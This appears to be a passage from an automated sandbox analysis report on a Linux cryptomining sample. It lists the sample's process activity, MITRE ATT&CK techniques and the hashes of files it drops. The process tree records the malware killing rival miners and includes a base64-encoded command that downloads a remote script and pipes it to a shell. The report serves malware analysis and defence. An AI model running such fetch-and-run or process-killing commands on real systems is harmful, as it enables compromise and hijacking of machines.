  - Attempts to change immutable files
  PID:2500
- /usr/bin/pgrep
  pgrep -f Y3VybCAxOTEuMTAxLjE4MC43Ni9saW4udHh0IHxzaAo
  2⤵
  PID:2499
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2502
- /usr/bin/pgrep
  pgrep -f mwyumwdbpq.conf
  2⤵
  PID:2501
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2504
- /usr/bin/pgrep
  pgrep -f honvbsasbf.conf
  2⤵
  - Reads runtime system information
  PID:2503
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2506
- /usr/bin/pgrep
  pgrep -f mqdsflm.cf
  2⤵
  - Reads runtime system information
  PID:2505
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2508
- /usr/bin/pgrep
  pgrep -f stratum
  2⤵
  PID:2507
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  - Attempts to change immutable files
  PID:2510
- /usr/bin/pgrep
  pgrep -f lower.sh
  2⤵
  - Reads CPU attributes
  PID:2509
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2512
- /usr/bin/pgrep
  pgrep -f ./ppp
  2⤵
  PID:2511
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2514
- /usr/bin/pgrep
  pgrep -f cryptonight
  2⤵
  PID:2513
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2516
- /usr/bin/pgrep
  pgrep -f ./seervceaess
  2⤵
  - Reads CPU attributes
  PID:2515
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2518
- /usr/bin/pgrep
  pgrep -f ./servceaess
  2⤵
  PID:2517
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2520
- /usr/bin/pgrep
  pgrep -f ./servceas
  2⤵
  - Reads CPU attributes
  PID:2519
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2522
- /usr/bin/pgrep
  pgrep -f ./servcesa
  2⤵
  PID:2521
- /usr/bin/xargs
  xargs -I "%" kill -9 "%"
  2⤵
  PID:2524

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

Unix Shell

T1059.004

Scheduled Task/Job

T1053

Cron

T1053.003

Software Deployment Tools

T1072

Persistence

Account Manipulation

T1098

SSH Authorized Keys

T1098.004

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Account Manipulation

T1098

SSH Authorized Keys

T1098.004

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Indicator Removal

T1070

Clear Linux or Mac System Logs

T1070.002

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Software Deployment Tools

T1072

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/etc/sysupdatas

Filesize
2B

MD5
b026324c6904b2a9cb4b88d6d61c81d1

SHA1
e5fa44f2b31c1fb553b6021e7360d07d5d91ff5e

SHA256
4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865

SHA512
3abb6677af34ac57c0ca5828fd94f9d886c26ce59a8ce60ecf6778079423dccff1d6f19cb655805d56098e6d38a1a710dee59523eed7511e5a9e4b8ccb3a4686

Download Submit
/etc/sysupdatas

Filesize
9B

MD5
970d39f8690eff0fe573e7bcf51bda9b

SHA1
46f8f835d3d3d41f063d0e8346260bb622b01a3f

SHA256
7e3735835710cbbb54a0bee4a323c83c54cb1f4f60463b9cf88006946fe2b9a5

SHA512
24952be3e8e47ffb4ee83d55f513edf041f6c4e420e2f52bdbdf0daee4c5735ad3ee5ed863f95ffa931a70d551590a7fe6ae67dc22f32060793e2525e4b56cd0

Download Submit
/tmp/fileutl.message.csu8sV

Filesize
235KB

MD5
373fe2f2ef99005d2550a482f09a3e51

SHA1
68e6572b55b1e77f7d171ebac7b2579b7a6bd51d

SHA256
7552d5ab0c3879756a860aaab8e7c2f8ffb9409ea9ff9e65fc046ba5c519ebe5

SHA512
def9e854b824d2fddc6a15f898be73cfb679ac38563f5af854546f49c9d5d2316a40176dc41d6b360bda7b65de53863a53e4eedadf6336000b031b77a113607b

Download Submit
/var/mail/root

Filesize
1B

MD5
68b329da9893e34099c7d8ad5cb9c940

SHA1
adc83b19e793491b1c6ea0fd8b46cd9f32e592fc

SHA256
01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b

SHA512
be688838ca8686e5c90689bf2ab585cef1137c999b48c70b92f67a5c34dc15697b5d11c982ed6d71be1e1e7f7b4e0733884aa97c3f7a339a8ed03577cf74be09

Download Submit
/var/spool/cron/crontabs/tmp.qbDkZy

Filesize
222B

MD5
7168fecb0d59c84f30fdeb16b4e36854

SHA1
9893b4b9eea24d325bb0d50c9c9a8a0fc53e81ac

SHA256
21ad369482b618a16b2a0932db2245e7a0e3b0f03cd7de571784690dfd2409cf

SHA512
c78fdcf2e9ab62aee0878dfe611e319dd79a01e23dc6067638890ecebea7d3b553f2c0998731f6af800d60ac7d55ce69878288240cf806b31a449f1856a36bd6

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads